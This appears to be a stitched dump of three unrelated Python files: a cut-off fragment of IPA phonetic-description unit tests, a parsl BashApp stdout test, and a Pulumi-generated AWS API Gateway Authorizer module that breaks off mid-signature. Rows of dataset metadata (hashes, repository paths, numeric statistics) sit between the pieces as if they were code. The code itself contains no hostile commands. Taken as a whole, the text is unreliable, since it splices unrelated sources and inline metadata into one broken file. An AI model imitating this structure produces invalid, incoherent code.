def test_ʑʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑʰˠ")
self.assertEqual(actual, expected)
def test_ʑ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ̬ʰˠ")
self.assertEqual(actual, expected)
def test_ɕ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized alveolo-palatal fricative pulmonic egressive consonant
def test_ʑʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑʰˤ")
self.assertEqual(actual, expected)
def test_ʑ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʑ̬ʰˤ")
self.assertEqual(actual, expected)
def test_ɕ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_alveolo_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized alveolo-palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ɕ̬ʰˤ")
self.assertEqual(actual, expected)
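# Taken together, the expected strings above follow one fixed template:
# voicing, optional "aspirated", optional secondary articulation, place,
# manner, then "pulmonic egressive consonant". A sketch of that composition;
# the function and argument names are illustrative:
def compose_description(voicing, place, manner, aspirated=False, secondary=None):
    parts = [voicing]
    if aspirated:
        parts.append("aspirated")
    if secondary:
        parts.append(secondary)
    parts += [place, manner, "pulmonic egressive consonant"]
    return " ".join(parts)

# compose_description("voiced", "alveolo-palatal", "fricative",
#                     aspirated=True, secondary="velarized")
# returns "voiced aspirated velarized alveolo-palatal fricative pulmonic egressive consonant"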
| 58.392336 | 144 | 0.857676 | 83,014 | 671,979 | 6.603477 | 0.008468 | 0.157849 | 0.241417 | 0.148765 | 0.994456 | 0.994456 | 0.994307 | 0.987238 | 0.875457 | 0.807009 | 0 | 0 | 0.088158 | 671,979 | 11,507 | 145 | 58.39741 | 0.889695 | 0.087503 | 0 | 0.539623 | 1 | 0 | 0.255187 | 0 | 0 | 0 | 0 | 0 | 0.249912 | 1 | 0.249912 | false | 0 | 0.000234 | 0 | 0.250263 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
314f797875e4eefc89f15ced2b5a0af7082c10e4 | 2,625 | py | Python | parsl/tests/test_bash_apps/test_kwarg_storage.py | daheise/parsl | 22fa8c75cdce782a0fa832692d8f19d7f57c25ab | [
"Apache-2.0"
] | null | null | null | parsl/tests/test_bash_apps/test_kwarg_storage.py | daheise/parsl | 22fa8c75cdce782a0fa832692d8f19d7f57c25ab | [
"Apache-2.0"
] | null | null | null | parsl/tests/test_bash_apps/test_kwarg_storage.py | daheise/parsl | 22fa8c75cdce782a0fa832692d8f19d7f57c25ab | [
"Apache-2.0"
] | null | null | null | import os
from parsl.app.app import App
@App('bash')
def foo(z=2, stdout=None):
return """echo {val}
""".format(val=z)
def test_command_format_1():
"""Testing command format for BashApps
"""
stdout = os.path.abspath('std.out.0')
if os.path.exists(stdout):
os.remove(stdout)
app_fu = foo(stdout=stdout)
print("app_fu : ", app_fu)
contents = None
assert app_fu.result() == 0, "BashApp exited with an error code : {0}".format(
app_fu.result())
with open(stdout, 'r') as stdout_f:
contents = stdout_f.read()
print("Contents : ", contents)
if os.path.exists(stdout):
os.remove(stdout)
assert contents == '2\n', 'Output does not match expected string "2", Got: "{0}"'.format(
contents)
# ===========
stdout = os.path.abspath('std.out.1')
if os.path.exists(stdout):
os.remove(stdout)
app_fu = foo(z=3, stdout=stdout)
print("app_fu : ", app_fu)
contents = None
assert app_fu.result() == 0, "BashApp exited with an error code : {0}".format(
app_fu.result())
with open(stdout, 'r') as stdout_f:
contents = stdout_f.read()
print("Contents : ", contents)
if os.path.exists(stdout):
os.remove(stdout)
assert contents == '3\n', 'Output does not match expected string "3", Got: "{0}"'.format(
contents)
# ===========
stdout = os.path.abspath('std.out.2')
if os.path.exists(stdout):
os.remove(stdout)
app_fu = foo(z=4, stdout=stdout)
print("app_fu : ", app_fu)
contents = None
assert app_fu.result() == 0, "BashApp exited with an error code : {0}".format(
app_fu.result())
with open(stdout, 'r') as stdout_f:
contents = stdout_f.read()
print("Contents : ", contents)
if os.path.exists(stdout):
os.remove(stdout)
assert contents == '4\n', 'Output does not match expected string "4", Got: "{0}"'.format(
contents)
# ===========
stdout = os.path.abspath('std.out.3')
if os.path.exists(stdout):
os.remove(stdout)
app_fu = foo(stdout=stdout)
print("app_fu : ", app_fu)
contents = None
assert app_fu.result() == 0, "BashApp exited with an error code : {0}".format(
app_fu.result())
with open(stdout, 'r') as stdout_f:
contents = stdout_f.read()
print("Contents : ", contents)
if os.path.exists(stdout):
os.remove(stdout)
assert contents == '2\n', 'Output does not match expected string "2", Got: "{0}"'.format(
contents)
return True
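# test_command_format_1 repeats the same run-and-check sequence four times
# with different stdout paths and z values. A minimal sketch of that flow
# as a helper; the name run_and_check is illustrative, not part of parsl's
# test suite:
def run_and_check(path, expected_line, **kwargs):
    stdout = os.path.abspath(path)
    if os.path.exists(stdout):
        os.remove(stdout)
    app_fu = foo(stdout=stdout, **kwargs)
    assert app_fu.result() == 0, "BashApp exited with an error code : {0}".format(
        app_fu.result())
    with open(stdout, 'r') as stdout_f:
        contents = stdout_f.read()
    os.remove(stdout)
    assert contents == expected_line, 'Output does not match expected string "{0}", Got: "{1}"'.format(
        expected_line, contents)

# Usage sketch: run_and_check('std.out.1', '3\n', z=3)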
| 25.240385 | 93 | 0.587048 | 362 | 2,625 | 4.160221 | 0.160221 | 0.066401 | 0.042497 | 0.074369 | 0.89907 | 0.89907 | 0.88247 | 0.838645 | 0.838645 | 0.838645 | 0 | 0.014177 | 0.247619 | 2,625 | 103 | 94 | 25.485437 | 0.748354 | 0.029333 | 0 | 0.764706 | 0 | 0 | 0.221654 | 0 | 0 | 0 | 0 | 0 | 0.117647 | 1 | 0.029412 | false | 0 | 0.029412 | 0.014706 | 0.088235 | 0.117647 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3169d2bd387da71bb5fe3932457e805399de815c | 36,204 | py | Python | sdk/python/pulumi_aws/apigateway/authorizer.py | chivandikwa/pulumi-aws | 19c08bf9dcb90544450ffa4eec7bf6751058fde2 | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2021-11-10T16:33:40.000Z | 2021-11-10T16:33:40.000Z | sdk/python/pulumi_aws/apigateway/authorizer.py | chivandikwa/pulumi-aws | 19c08bf9dcb90544450ffa4eec7bf6751058fde2 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_aws/apigateway/authorizer.py | chivandikwa/pulumi-aws | 19c08bf9dcb90544450ffa4eec7bf6751058fde2 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['AuthorizerArgs', 'Authorizer']
@pulumi.input_type
class AuthorizerArgs:
def __init__(__self__, *,
rest_api: pulumi.Input[str],
authorizer_credentials: Optional[pulumi.Input[str]] = None,
authorizer_result_ttl_in_seconds: Optional[pulumi.Input[int]] = None,
authorizer_uri: Optional[pulumi.Input[str]] = None,
identity_source: Optional[pulumi.Input[str]] = None,
identity_validation_expression: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
provider_arns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
type: Optional[pulumi.Input[str]] = None):
"""
        The set of arguments for constructing an Authorizer resource.
:param pulumi.Input[str] rest_api: The ID of the associated REST API
:param pulumi.Input[str] authorizer_credentials: The credentials required for the authorizer. To specify an IAM Role for API Gateway to assume, use the IAM Role ARN.
:param pulumi.Input[int] authorizer_result_ttl_in_seconds: The TTL of cached authorizer results in seconds. Defaults to `300`.
:param pulumi.Input[str] authorizer_uri: The authorizer's Uniform Resource Identifier (URI). This must be a well-formed Lambda function URI in the form of `arn:aws:apigateway:{region}:lambda:path/{service_api}`,
e.g., `arn:aws:apigateway:us-west-2:lambda:path/2015-03-31/functions/arn:aws:lambda:us-west-2:012345678912:function:my-function/invocations`
:param pulumi.Input[str] identity_source: The source of the identity in an incoming request. Defaults to `method.request.header.Authorization`. For `REQUEST` type, this may be a comma-separated list of values, including headers, query string parameters and stage variables - e.g., `"method.request.header.SomeHeaderName,method.request.querystring.SomeQueryStringName,stageVariables.SomeStageVariableName"`
:param pulumi.Input[str] identity_validation_expression: A validation expression for the incoming identity. For `TOKEN` type, this value should be a regular expression. The incoming token from the client is matched against this expression, and will proceed if the token matches. If the token doesn't match, the client receives a 401 Unauthorized response.
:param pulumi.Input[str] name: The name of the authorizer
:param pulumi.Input[Sequence[pulumi.Input[str]]] provider_arns: A list of the Amazon Cognito user pool ARNs. Each element is of this format: `arn:aws:cognito-idp:{region}:{account_id}:userpool/{user_pool_id}`.
:param pulumi.Input[str] type: The type of the authorizer. Possible values are `TOKEN` for a Lambda function using a single authorization token submitted in a custom header, `REQUEST` for a Lambda function using incoming request parameters, or `COGNITO_USER_POOLS` for using an Amazon Cognito user pool. Defaults to `TOKEN`.
"""
pulumi.set(__self__, "rest_api", rest_api)
if authorizer_credentials is not None:
pulumi.set(__self__, "authorizer_credentials", authorizer_credentials)
if authorizer_result_ttl_in_seconds is not None:
pulumi.set(__self__, "authorizer_result_ttl_in_seconds", authorizer_result_ttl_in_seconds)
if authorizer_uri is not None:
pulumi.set(__self__, "authorizer_uri", authorizer_uri)
if identity_source is not None:
pulumi.set(__self__, "identity_source", identity_source)
if identity_validation_expression is not None:
pulumi.set(__self__, "identity_validation_expression", identity_validation_expression)
if name is not None:
pulumi.set(__self__, "name", name)
if provider_arns is not None:
pulumi.set(__self__, "provider_arns", provider_arns)
if type is not None:
pulumi.set(__self__, "type", type)
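    # Illustrative sketch (hypothetical resource names, not part of the
    # generated API): args for a Lambda-backed TOKEN authorizer might be
    # built as:
    #   args = AuthorizerArgs(
    #       rest_api=demo_rest_api.id,
    #       authorizer_uri=authorizer_fn.invoke_arn,
    #       type="TOKEN")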
@property
@pulumi.getter(name="restApi")
def rest_api(self) -> pulumi.Input[str]:
"""
The ID of the associated REST API
"""
return pulumi.get(self, "rest_api")
@rest_api.setter
def rest_api(self, value: pulumi.Input[str]):
pulumi.set(self, "rest_api", value)
@property
@pulumi.getter(name="authorizerCredentials")
def authorizer_credentials(self) -> Optional[pulumi.Input[str]]:
"""
The credentials required for the authorizer. To specify an IAM Role for API Gateway to assume, use the IAM Role ARN.
"""
return pulumi.get(self, "authorizer_credentials")
@authorizer_credentials.setter
def authorizer_credentials(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "authorizer_credentials", value)
@property
@pulumi.getter(name="authorizerResultTtlInSeconds")
def authorizer_result_ttl_in_seconds(self) -> Optional[pulumi.Input[int]]:
"""
The TTL of cached authorizer results in seconds. Defaults to `300`.
"""
return pulumi.get(self, "authorizer_result_ttl_in_seconds")
@authorizer_result_ttl_in_seconds.setter
def authorizer_result_ttl_in_seconds(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "authorizer_result_ttl_in_seconds", value)
@property
@pulumi.getter(name="authorizerUri")
def authorizer_uri(self) -> Optional[pulumi.Input[str]]:
"""
The authorizer's Uniform Resource Identifier (URI). This must be a well-formed Lambda function URI in the form of `arn:aws:apigateway:{region}:lambda:path/{service_api}`,
e.g., `arn:aws:apigateway:us-west-2:lambda:path/2015-03-31/functions/arn:aws:lambda:us-west-2:012345678912:function:my-function/invocations`
"""
return pulumi.get(self, "authorizer_uri")
@authorizer_uri.setter
def authorizer_uri(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "authorizer_uri", value)
@property
@pulumi.getter(name="identitySource")
def identity_source(self) -> Optional[pulumi.Input[str]]:
"""
The source of the identity in an incoming request. Defaults to `method.request.header.Authorization`. For `REQUEST` type, this may be a comma-separated list of values, including headers, query string parameters and stage variables - e.g., `"method.request.header.SomeHeaderName,method.request.querystring.SomeQueryStringName,stageVariables.SomeStageVariableName"`
"""
return pulumi.get(self, "identity_source")
@identity_source.setter
def identity_source(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "identity_source", value)
@property
@pulumi.getter(name="identityValidationExpression")
def identity_validation_expression(self) -> Optional[pulumi.Input[str]]:
"""
        A validation expression for the incoming identity. For `TOKEN` type, this value should be a regular expression. The incoming token from the client is matched against this expression, and the request will proceed if the token matches. If the token doesn't match, the client receives a 401 Unauthorized response.
"""
return pulumi.get(self, "identity_validation_expression")
@identity_validation_expression.setter
def identity_validation_expression(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "identity_validation_expression", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the authorizer
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="providerArns")
def provider_arns(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of the Amazon Cognito user pool ARNs. Each element is of this format: `arn:aws:cognito-idp:{region}:{account_id}:userpool/{user_pool_id}`.
"""
return pulumi.get(self, "provider_arns")
@provider_arns.setter
def provider_arns(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "provider_arns", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
"""
The type of the authorizer. Possible values are `TOKEN` for a Lambda function using a single authorization token submitted in a custom header, `REQUEST` for a Lambda function using incoming request parameters, or `COGNITO_USER_POOLS` for using an Amazon Cognito user pool. Defaults to `TOKEN`.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@pulumi.input_type
class _AuthorizerState:
def __init__(__self__, *,
authorizer_credentials: Optional[pulumi.Input[str]] = None,
authorizer_result_ttl_in_seconds: Optional[pulumi.Input[int]] = None,
authorizer_uri: Optional[pulumi.Input[str]] = None,
identity_source: Optional[pulumi.Input[str]] = None,
identity_validation_expression: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
provider_arns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
rest_api: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering Authorizer resources.
:param pulumi.Input[str] authorizer_credentials: The credentials required for the authorizer. To specify an IAM Role for API Gateway to assume, use the IAM Role ARN.
:param pulumi.Input[int] authorizer_result_ttl_in_seconds: The TTL of cached authorizer results in seconds. Defaults to `300`.
:param pulumi.Input[str] authorizer_uri: The authorizer's Uniform Resource Identifier (URI). This must be a well-formed Lambda function URI in the form of `arn:aws:apigateway:{region}:lambda:path/{service_api}`,
e.g., `arn:aws:apigateway:us-west-2:lambda:path/2015-03-31/functions/arn:aws:lambda:us-west-2:012345678912:function:my-function/invocations`
:param pulumi.Input[str] identity_source: The source of the identity in an incoming request. Defaults to `method.request.header.Authorization`. For `REQUEST` type, this may be a comma-separated list of values, including headers, query string parameters and stage variables - e.g., `"method.request.header.SomeHeaderName,method.request.querystring.SomeQueryStringName,stageVariables.SomeStageVariableName"`
        :param pulumi.Input[str] identity_validation_expression: A validation expression for the incoming identity. For `TOKEN` type, this value should be a regular expression. The incoming token from the client is matched against this expression, and the request will proceed if the token matches. If the token doesn't match, the client receives a 401 Unauthorized response.
:param pulumi.Input[str] name: The name of the authorizer
:param pulumi.Input[Sequence[pulumi.Input[str]]] provider_arns: A list of the Amazon Cognito user pool ARNs. Each element is of this format: `arn:aws:cognito-idp:{region}:{account_id}:userpool/{user_pool_id}`.
:param pulumi.Input[str] rest_api: The ID of the associated REST API
:param pulumi.Input[str] type: The type of the authorizer. Possible values are `TOKEN` for a Lambda function using a single authorization token submitted in a custom header, `REQUEST` for a Lambda function using incoming request parameters, or `COGNITO_USER_POOLS` for using an Amazon Cognito user pool. Defaults to `TOKEN`.
"""
if authorizer_credentials is not None:
pulumi.set(__self__, "authorizer_credentials", authorizer_credentials)
if authorizer_result_ttl_in_seconds is not None:
pulumi.set(__self__, "authorizer_result_ttl_in_seconds", authorizer_result_ttl_in_seconds)
if authorizer_uri is not None:
pulumi.set(__self__, "authorizer_uri", authorizer_uri)
if identity_source is not None:
pulumi.set(__self__, "identity_source", identity_source)
if identity_validation_expression is not None:
pulumi.set(__self__, "identity_validation_expression", identity_validation_expression)
if name is not None:
pulumi.set(__self__, "name", name)
if provider_arns is not None:
pulumi.set(__self__, "provider_arns", provider_arns)
if rest_api is not None:
pulumi.set(__self__, "rest_api", rest_api)
if type is not None:
pulumi.set(__self__, "type", type)
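    # Illustrative sketch (hypothetical values): partial state used when
    # looking up or filtering existing Authorizer resources:
    #   state = _AuthorizerState(rest_api="a1b2c3", name="demoAuthorizer")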
@property
@pulumi.getter(name="authorizerCredentials")
def authorizer_credentials(self) -> Optional[pulumi.Input[str]]:
"""
The credentials required for the authorizer. To specify an IAM Role for API Gateway to assume, use the IAM Role ARN.
"""
return pulumi.get(self, "authorizer_credentials")
@authorizer_credentials.setter
def authorizer_credentials(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "authorizer_credentials", value)
@property
@pulumi.getter(name="authorizerResultTtlInSeconds")
def authorizer_result_ttl_in_seconds(self) -> Optional[pulumi.Input[int]]:
"""
The TTL of cached authorizer results in seconds. Defaults to `300`.
"""
return pulumi.get(self, "authorizer_result_ttl_in_seconds")
@authorizer_result_ttl_in_seconds.setter
def authorizer_result_ttl_in_seconds(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "authorizer_result_ttl_in_seconds", value)
@property
@pulumi.getter(name="authorizerUri")
def authorizer_uri(self) -> Optional[pulumi.Input[str]]:
"""
The authorizer's Uniform Resource Identifier (URI). This must be a well-formed Lambda function URI in the form of `arn:aws:apigateway:{region}:lambda:path/{service_api}`,
e.g., `arn:aws:apigateway:us-west-2:lambda:path/2015-03-31/functions/arn:aws:lambda:us-west-2:012345678912:function:my-function/invocations`
"""
return pulumi.get(self, "authorizer_uri")
@authorizer_uri.setter
def authorizer_uri(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "authorizer_uri", value)
@property
@pulumi.getter(name="identitySource")
def identity_source(self) -> Optional[pulumi.Input[str]]:
"""
The source of the identity in an incoming request. Defaults to `method.request.header.Authorization`. For `REQUEST` type, this may be a comma-separated list of values, including headers, query string parameters and stage variables - e.g., `"method.request.header.SomeHeaderName,method.request.querystring.SomeQueryStringName,stageVariables.SomeStageVariableName"`
"""
return pulumi.get(self, "identity_source")
@identity_source.setter
def identity_source(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "identity_source", value)
@property
@pulumi.getter(name="identityValidationExpression")
def identity_validation_expression(self) -> Optional[pulumi.Input[str]]:
"""
        A validation expression for the incoming identity. For `TOKEN` type, this value should be a regular expression. The incoming token from the client is matched against this expression, and the request will proceed if the token matches. If the token doesn't match, the client receives a 401 Unauthorized response.
"""
return pulumi.get(self, "identity_validation_expression")
@identity_validation_expression.setter
def identity_validation_expression(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "identity_validation_expression", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the authorizer
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="providerArns")
def provider_arns(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of the Amazon Cognito user pool ARNs. Each element is of this format: `arn:aws:cognito-idp:{region}:{account_id}:userpool/{user_pool_id}`.
"""
return pulumi.get(self, "provider_arns")
@provider_arns.setter
def provider_arns(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "provider_arns", value)
@property
@pulumi.getter(name="restApi")
def rest_api(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the associated REST API
"""
return pulumi.get(self, "rest_api")
@rest_api.setter
def rest_api(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "rest_api", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
"""
The type of the authorizer. Possible values are `TOKEN` for a Lambda function using a single authorization token submitted in a custom header, `REQUEST` for a Lambda function using incoming request parameters, or `COGNITO_USER_POOLS` for using an Amazon Cognito user pool. Defaults to `TOKEN`.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
class Authorizer(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
authorizer_credentials: Optional[pulumi.Input[str]] = None,
authorizer_result_ttl_in_seconds: Optional[pulumi.Input[int]] = None,
authorizer_uri: Optional[pulumi.Input[str]] = None,
identity_source: Optional[pulumi.Input[str]] = None,
identity_validation_expression: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
provider_arns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
rest_api: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Provides an API Gateway Authorizer.
## Example Usage
```python
import pulumi
import pulumi_aws as aws
demo_rest_api = aws.apigateway.RestApi("demoRestApi")
invocation_role = aws.iam.Role("invocationRole",
path="/",
assume_role_policy=\"\"\"{
"Version": "2012-10-17",
"Statement": [
{
"Action": "sts:AssumeRole",
"Principal": {
"Service": "apigateway.amazonaws.com"
},
"Effect": "Allow",
"Sid": ""
}
]
}
\"\"\")
lambda_ = aws.iam.Role("lambda", assume_role_policy=\"\"\"{
"Version": "2012-10-17",
"Statement": [
{
"Action": "sts:AssumeRole",
"Principal": {
"Service": "lambda.amazonaws.com"
},
"Effect": "Allow",
"Sid": ""
}
]
}
\"\"\")
authorizer = aws.lambda_.Function("authorizer",
code=pulumi.FileArchive("lambda-function.zip"),
role=lambda_.arn,
handler="exports.example")
demo_authorizer = aws.apigateway.Authorizer("demoAuthorizer",
rest_api=demo_rest_api.id,
authorizer_uri=authorizer.invoke_arn,
authorizer_credentials=invocation_role.arn)
invocation_policy = aws.iam.RolePolicy("invocationPolicy",
role=invocation_role.id,
policy=authorizer.arn.apply(lambda arn: f\"\"\"{{
"Version": "2012-10-17",
"Statement": [
{{
"Action": "lambda:InvokeFunction",
"Effect": "Allow",
"Resource": "{arn}"
}}
]
}}
\"\"\"))
```
## Import
        An AWS API Gateway Authorizer can be imported using the `REST-API-ID/AUTHORIZER-ID`, e.g.,
```sh
$ pulumi import aws:apigateway/authorizer:Authorizer authorizer 12345abcde/example
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] authorizer_credentials: The credentials required for the authorizer. To specify an IAM Role for API Gateway to assume, use the IAM Role ARN.
:param pulumi.Input[int] authorizer_result_ttl_in_seconds: The TTL of cached authorizer results in seconds. Defaults to `300`.
:param pulumi.Input[str] authorizer_uri: The authorizer's Uniform Resource Identifier (URI). This must be a well-formed Lambda function URI in the form of `arn:aws:apigateway:{region}:lambda:path/{service_api}`,
e.g., `arn:aws:apigateway:us-west-2:lambda:path/2015-03-31/functions/arn:aws:lambda:us-west-2:012345678912:function:my-function/invocations`
:param pulumi.Input[str] identity_source: The source of the identity in an incoming request. Defaults to `method.request.header.Authorization`. For `REQUEST` type, this may be a comma-separated list of values, including headers, query string parameters and stage variables - e.g., `"method.request.header.SomeHeaderName,method.request.querystring.SomeQueryStringName,stageVariables.SomeStageVariableName"`
        :param pulumi.Input[str] identity_validation_expression: A validation expression for the incoming identity. For `TOKEN` type, this value should be a regular expression. The incoming token from the client is matched against this expression, and the request will proceed if the token matches. If the token doesn't match, the client receives a 401 Unauthorized response.
:param pulumi.Input[str] name: The name of the authorizer
:param pulumi.Input[Sequence[pulumi.Input[str]]] provider_arns: A list of the Amazon Cognito user pool ARNs. Each element is of this format: `arn:aws:cognito-idp:{region}:{account_id}:userpool/{user_pool_id}`.
:param pulumi.Input[str] rest_api: The ID of the associated REST API
:param pulumi.Input[str] type: The type of the authorizer. Possible values are `TOKEN` for a Lambda function using a single authorization token submitted in a custom header, `REQUEST` for a Lambda function using incoming request parameters, or `COGNITO_USER_POOLS` for using an Amazon Cognito user pool. Defaults to `TOKEN`.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: AuthorizerArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides an API Gateway Authorizer.
## Example Usage
```python
import pulumi
import pulumi_aws as aws
demo_rest_api = aws.apigateway.RestApi("demoRestApi")
invocation_role = aws.iam.Role("invocationRole",
path="/",
assume_role_policy=\"\"\"{
"Version": "2012-10-17",
"Statement": [
{
"Action": "sts:AssumeRole",
"Principal": {
"Service": "apigateway.amazonaws.com"
},
"Effect": "Allow",
"Sid": ""
}
]
}
\"\"\")
lambda_ = aws.iam.Role("lambda", assume_role_policy=\"\"\"{
"Version": "2012-10-17",
"Statement": [
{
"Action": "sts:AssumeRole",
"Principal": {
"Service": "lambda.amazonaws.com"
},
"Effect": "Allow",
"Sid": ""
}
]
}
\"\"\")
authorizer = aws.lambda_.Function("authorizer",
code=pulumi.FileArchive("lambda-function.zip"),
role=lambda_.arn,
handler="exports.example")
demo_authorizer = aws.apigateway.Authorizer("demoAuthorizer",
rest_api=demo_rest_api.id,
authorizer_uri=authorizer.invoke_arn,
authorizer_credentials=invocation_role.arn)
invocation_policy = aws.iam.RolePolicy("invocationPolicy",
role=invocation_role.id,
policy=authorizer.arn.apply(lambda arn: f\"\"\"{{
"Version": "2012-10-17",
"Statement": [
{{
"Action": "lambda:InvokeFunction",
"Effect": "Allow",
"Resource": "{arn}"
}}
]
}}
\"\"\"))
```
## Import
        An AWS API Gateway Authorizer can be imported using the `REST-API-ID/AUTHORIZER-ID`, e.g.,
```sh
$ pulumi import aws:apigateway/authorizer:Authorizer authorizer 12345abcde/example
```
:param str resource_name: The name of the resource.
:param AuthorizerArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(AuthorizerArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
authorizer_credentials: Optional[pulumi.Input[str]] = None,
authorizer_result_ttl_in_seconds: Optional[pulumi.Input[int]] = None,
authorizer_uri: Optional[pulumi.Input[str]] = None,
identity_source: Optional[pulumi.Input[str]] = None,
identity_validation_expression: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
provider_arns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
rest_api: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = AuthorizerArgs.__new__(AuthorizerArgs)
__props__.__dict__["authorizer_credentials"] = authorizer_credentials
__props__.__dict__["authorizer_result_ttl_in_seconds"] = authorizer_result_ttl_in_seconds
__props__.__dict__["authorizer_uri"] = authorizer_uri
__props__.__dict__["identity_source"] = identity_source
__props__.__dict__["identity_validation_expression"] = identity_validation_expression
__props__.__dict__["name"] = name
__props__.__dict__["provider_arns"] = provider_arns
if rest_api is None and not opts.urn:
raise TypeError("Missing required property 'rest_api'")
__props__.__dict__["rest_api"] = rest_api
__props__.__dict__["type"] = type
super(Authorizer, __self__).__init__(
'aws:apigateway/authorizer:Authorizer',
resource_name,
__props__,
opts)
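    # Note: `_internal_init` drives creation of new resources; adopting an
    # existing resource instead goes through `get` below, which builds an
    # `_AuthorizerState` rather than `AuthorizerArgs`.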
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
authorizer_credentials: Optional[pulumi.Input[str]] = None,
